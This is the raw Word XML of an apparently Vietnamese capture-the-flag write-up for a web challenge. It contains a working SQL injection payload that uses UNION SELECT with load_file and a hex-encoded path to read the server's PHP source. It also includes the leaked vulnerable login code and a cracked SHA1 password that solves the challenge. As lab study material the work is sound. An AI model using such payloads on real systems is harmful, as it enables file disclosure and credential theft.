        <w:t>challenge/web-serveur/ch31/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72722FF2" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CBCC13" w14:textId="21A63CE5" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mã hex là: 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00921CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2f6368616c6c656e67652f7765622d736572766575722f636833312f696e6465782e706870</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017AD8EA" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A3F7C4" w14:textId="1B488174" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B03B3" w14:textId="60E03391" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 and 1=2 union select null,null,null,load_file(0x2f6368616c6c656e67652f7765622d736572766575722f636833312f696e6465782e706870)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427221D" w14:textId="3C5468B5" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B888FA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>if(isset($_POST['username'], $_POST['password']) &amp;&amp; !empty($_POST['username']) &amp;&amp; !empty($_POST['password']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B9FE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E367BE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$user = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], strtolower($_POST['username']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030FCEA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$pass = sha1($_POST['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10777BFE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</w:p>
    <w:p w14:paraId="52DC6FE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$result = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT member_password FROM member WHERE member_login='".$user."'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBDDD56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if(mysqli_num_rows($result) == 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E12614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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E8E3C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$data = mysqli_fetch_array($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923336B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if($pass == stringxor($key, base64_decode($data['member_password']))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46785C5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// authentication success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127C93D0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print "&lt;p&gt;Authentication success !!&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F4A3C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if ($user == "admin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FB810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    print "&lt;p&gt;Yeah !!! You're admin ! Use this password to complete this challenge.&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115169B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else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4110F52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    print "&lt;p&gt;But... you're not admin !&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42999F8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1A89C70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lastRenderedPageBreak/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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A507D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        // authentication failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002BD5ED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"&lt;p&gt;Authentication failed !&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBA8565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0A9C3230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253E09AC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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805C1BB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"&lt;p&gt;User not found !&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE61040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680A67FA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7243BE0E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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDF0FEE" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRPr="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2772E638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>if($_GET['action'] == "members"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF6B421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if(isset($_GET['id']) &amp;&amp; !empty($_GET['id']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C694242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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1FC9F2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// secure ID variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77933F5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$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $_GET['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F32675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$result = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM member WHERE member_id=$id") or die(mysqli_error($GLOBALS["___mysqli_ston"]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917359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</w:p>
    <w:p w14:paraId="2A6FA897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if(mysqli_num_rows($result) == 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A36E51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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CBDB83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$data = mysqli_fetch_array($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B1125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"ID : ".$data["member_id"]."&lt;br /&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AA1ED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"Username : ".$data["member_login"]."&lt;br /&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC2CBA6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"Email : ".$data["member_email"]."&lt;br /&gt;";</w:t>
      </w:r>
      <w:r w:rsidRPr="00921CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B953E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6669419D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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0718EC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        print "no result found";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E53FD5B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 xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B945A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE72A1E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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847B09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$result = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM member");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414F7092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while ($row = mysqli_fetch_assoc($result)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E5C58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</w:r>
      <w:r w:rsidRPr="00921CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>print "&lt;p&gt;&lt;a href=\"?action=members&amp;id=".$row['member_id']."\"&gt;".$row['member_login']."&lt;/a&gt;&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19496481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</w:r>
      <w:r w:rsidRPr="00921CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA155BF" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRPr="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D41CE1C" w14:textId="0C66E1CF" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F16F74" w14:textId="064DAA42" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27320DC0" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECAE3B1" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117574EE" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229D5827" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347B7AC8" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384F3447" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67208E54" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DED5C44" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C121D84" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA5F6C6" w14:textId="05F967DC" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đây là source code. Ta chỉ cần chú ý  điểm quan trọng là giải dc bài toán</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A456E66" w14:textId="44A917EB" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7445A484" w14:textId="5F28EE03" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://nhienit.files.wordpress.com/2020/05/1-10.png?w=1024"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3E7F243" wp14:editId="473F36DF">
            <wp:extent cx="5943600" cy="143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6077C8C" w14:textId="2A81E1C2" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BE9070" w14:textId="77777777" w:rsidR="00921CBE" w:rsidRPr="004415A5" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD8D1C6" w14:textId="17FCFB97" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://nhienit.files.wordpress.com/2020/05/1-12.png?w=467"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CB37D3F" wp14:editId="23C03A85">
            <wp:extent cx="5933440" cy="35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4C9B75" w14:textId="18F4BBE9" w:rsidR="00921CBE" w:rsidRDefault="00921CBE" w:rsidP="00921CBE"/>
    <w:p w14:paraId="058207E5" w14:textId="772A60BD" w:rsidR="00955F48" w:rsidRDefault="00BE6C9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nghĩa là mk ta nhập vào sẽ được mã hóa sha1 phải bằng stringxor($key, base64_decode($data[‘member_password’]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE24C7" w14:textId="1265B259" w:rsidR="00BE6C9B" w:rsidRDefault="00BE6C9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6277C1D1" w14:textId="08119CA5" w:rsidR="00BE6C9B" w:rsidRDefault="00BE6C9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hàm stringxor</w:t>
      </w:r>
      <w:r w:rsidR="006A75A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nguồn: </w:t>
      </w:r>
      <w:r w:rsidR="006A75A6" w:rsidRPr="006A75A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://3v4l.org/Q2ne0</w:t>
      </w:r>
      <w:r w:rsidR="006A75A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCDD1F0" w14:textId="78A6DEEF" w:rsidR="00BE6C9B" w:rsidRDefault="00BE6C9B" w:rsidP="00BE6C9B"/>
    <w:p w14:paraId="79423D23" w14:textId="27D57890" w:rsidR="00BE6C9B" w:rsidRDefault="00BE6C9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADC099D" w14:textId="18446258" w:rsidR="00955F48" w:rsidRDefault="00955F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42DA1297" w14:textId="50EC41B3" w:rsidR="00B958C4" w:rsidRDefault="006A75A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1575B" wp14:editId="107E95E3">
            <wp:extent cx="5933440" cy="3826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3" t="17504" r="14017" b="9299"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5942119" cy="383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AB31B" w14:textId="7BCCCF99" w:rsidR="00B958C4" w:rsidRDefault="00B958C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D65BECD" w14:textId="77777777" w:rsidR="00750E72" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EAD671A" w14:textId="6D592928" w:rsidR="00750E72" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108CE622" w14:textId="77777777" w:rsidR="00750E72" w:rsidRDefault="00750E72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022F6C24" w14:textId="2D365128" w:rsidR="006A75A6" w:rsidRPr="006A75A6" w:rsidRDefault="006A75A6" w:rsidP="006A75A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">giải mã hash sha1 : </w:t>
      </w:r>
      <w:r>
        <w:t>77be4fc97f77f5f48308942bb6e32aacabed9cef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A75A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> superpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BD715" w14:textId="5F1738AA" w:rsidR="00B2262F" w:rsidRDefault="00B2262F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E5B6B0" w14:textId="77777777" w:rsidR="00B2262F" w:rsidRDefault="00B2262F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB68916" w14:textId="77B607FA" w:rsidR="00A613EA" w:rsidRDefault="00A613EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5CECBF" w14:textId="067D45FF" w:rsidR="00A613EA" w:rsidRPr="00A613EA" w:rsidRDefault="00A613EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9E177B" w14:textId="77777777" w:rsidR="00A613EA" w:rsidRPr="00A613EA" w:rsidRDefault="00A613EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A613EA" w:rsidRPr="00A613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2F8"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004415A5"/>
    <w:rsid w:val="00643DE8"/>
    <w:rsid w:val="006712F8"/>
    <w:rsid w:val="006A75A6"/>
    <w:rsid w:val="00750E72"/>
    <w:rsid w:val="00762E07"/>
    <w:rsid w:val="007B6ADD"/>
    <w:rsid w:val="007D3AB6"/>
    <w:rsid w:val="00921CBE"/>
    <w:rsid w:val="00955F48"/>
    <w:rsid w:val="00A613EA"/>
    <w:rsid w:val="00B2262F"/>
    <w:rsid w:val="00B958C4"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BE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1EAE0B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AB362267-CEBF-F74D-83F6-2B0EBB9B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F48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  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007B6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2022-10-14T00:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-23T01:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>